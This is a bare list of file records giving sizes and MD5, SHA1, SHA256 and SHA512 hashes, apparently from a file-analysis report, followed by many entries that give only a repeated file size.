Filesize
45.4MB
MD53bb61c4bfa553ab2e09a105b8be54174
SHA183ee86f0f3ad42fdeea0afedf8d838215126e4a6
SHA2560cd73ea7aab988fd89c81970d83e4fd7ad3314f0c80c8db5ac0f12925fe8a4b6
SHA512bffb42a0ccdd36ea65801e751e5f2c296659b39c27532a83240e81f2e97607506e4c9d773f45f6e5b70519f9cbadb3fa3516d247c8d325152ae0108593ae3462
-
Filesize
1.1MB
MD5cf9e5f9598362779db57d275f471af9b
SHA1f961defc09cea3220c747dd533f0e08df5ef80ce
SHA256edb67c5e371e3298d2f9291a472dc985d9a0462172d47c5aff5d882c0cb3ab63
SHA512d29b4cce5e6410e85783779c5ade80dee2d670a58f34c0ab28e2806c641fe6d4eb67ed0516c266f323728ca1cbfbe3c28b13ab2d98b60678a2f8d8cdbc251501
-
Filesize
1019KB
MD5ce4bf9d95d5b56a50a0b77e1bae4e4f3
SHA12f138d2c09ed5b88e824bc8fe85105b200ddd1c0
SHA25693518ff49abcff44327d60ee9f526545012af0c7fa2fd20e2f2135cbaa3962c8
SHA512693542537f9d525114e3f8d1542006262184440c52394d9edb01a8eaf3314870ec057acc2cf05941cfefc47885d20b7f1181156bcdfe59840ec8d341a0bc21db
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
14.0MB
MD56eea0b6ad06282b51b6194aa9c5729c3
SHA15f5c19801ae6471bcac8eafa35e2185dc572bb6e
SHA256a77129fc13b74e12dab76ff6ea91e097bd672a4fe90761030ede290ec03ffaa4
SHA512cb23d90f0fa8cc17d36c3cc86dc29470b758f32bb237c46b30960649dd09537cbb5358812809b6b6d323fe3bc8ea8a47945fd9b0883e7f64f9f3bdc02714971a
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
32KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
304KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
952KB
-
Filesize
952KB
-
Filesize
16KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
16KB
-
Filesize
1.1MB
-
Filesize
16KB
-
Filesize
1.1MB
-
Filesize
16KB
-
Filesize
1.1MB
-
Filesize
16KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
72KB